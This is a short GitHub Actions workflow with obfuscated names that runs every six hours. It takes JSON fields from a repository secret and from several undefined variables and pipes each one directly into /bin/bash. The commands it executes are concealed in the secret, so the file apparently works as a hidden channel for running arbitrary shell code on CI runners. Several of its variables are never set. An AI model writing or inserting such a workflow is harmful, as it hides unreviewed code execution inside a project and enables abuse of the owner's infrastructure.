name: yanzischuc
on:
  workflow_dispatch:
  schedule:
    - cron: '18 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanzischuc
        env:
          aa464: ${{ secrets.aa464 }}
        run: |
          echo $aa464 | jq -r .c0 | /bin/bash
          echo $x1718 | jq -r .mh0769 | /bin/bash
          echo $tswx55270 | jq -r .b36 | /bin/bash
          echo $dnls4 | jq -r .y968 | /bin/bash
          echo $junq64865 | jq -r .chaei7217 | /bin/bash
          echo $mlvz35 | jq -r .aipfo3941 | /bin/bash
          echo $rytpj5 | jq -r .yr5696 | /bin/bash

